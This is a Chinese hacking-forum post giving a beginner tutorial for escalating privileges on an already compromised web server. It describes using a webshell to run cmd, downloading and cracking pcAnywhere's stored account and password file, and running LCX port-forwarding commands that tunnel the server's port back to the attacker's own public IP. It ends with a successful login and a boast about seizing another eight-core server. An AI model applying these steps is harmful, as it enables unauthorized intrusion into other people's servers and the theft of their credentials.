|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。, h7 U. e% B: R' z' m7 ^
4 I/ d+ H K. t- Y9 Z
提权方法:pcanywhere+LCX
6 K$ v; e' S; A: _
/ r/ T6 M7 Q5 t5 r3 L获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
6 q- ]: a6 o3 V4 m
0 B, i- w S* I/ y+ N% h% W在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
: T W* F& H8 a5 m8 f/ p0 Y) k3 c! l
) @, @; P3 F! F! @ B2 v/ ]
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
+ Y7 u+ O2 ?4 w/ }' h7 d& h# u7 _: k, s+ q- [. w6 s
9 p( I; R$ Q8 W$ F1 j4 \# y+ M
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。4 m7 {% s5 J4 Z, L" p1 j
7 x" K; H" S" h. f+ ]* B8 ~
( m1 _6 l3 W8 `4 ?
3 R: @1 R) D/ r
' _; f7 c8 a: \由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
9 n' y' p; o" D9 w5 w. X0 f& i+ D( M7 \$ M" o l
' Y E$ ?+ p+ x2 ~, O# X
LCX的用法再简单说下:
+ R9 b% u, ~# x" n7 }. v
) a* }: Y3 E! ?9 d) q6 r: N. E8 ]服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口). s3 |2 J# o( N: M7 }; d
# T5 c( x' D; D L9 c+ x# r
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)' p( u# A' i" i: X9 ~
4 I- j6 x( Y1 _% u, K. |5 R由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。) J( A- i4 x2 K5 _
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
3 S- [: t% ]8 A9 ^0 T( l% h7 g8 z& f$ Z
; ^8 {6 y/ b4 c8 l1 e
8 [8 u* s3 ^+ l
; K! Q1 R2 i. o3 H0 F7 o呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
( C6 u K/ p: ]1 J) Q
4 H# i4 K, V B y
/ W! w; U/ g A3 v. r
V$ h# z5 H1 p! A X2 L4 F
6 x, U8 X; G! a [% T" }我们本地连接试试,输入我们刚破解的账号密码2 |: R' V5 J3 n: f
* T7 `9 _8 k+ x" A$ O5 u. Q
" Z5 |0 W9 { [1 y9 q
呵呵``连接成功,服务器不错,又一个8核^︵^
/ O) M# u/ s: f+ t! L2 J' J
- y3 a* K* \) w4 O! N( g0 K4 o
8 g: n* d' L* J6 b
3 C& F% A$ I4 ^" {8 c5 C' D |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-12-15 15:36
| 
.gif)
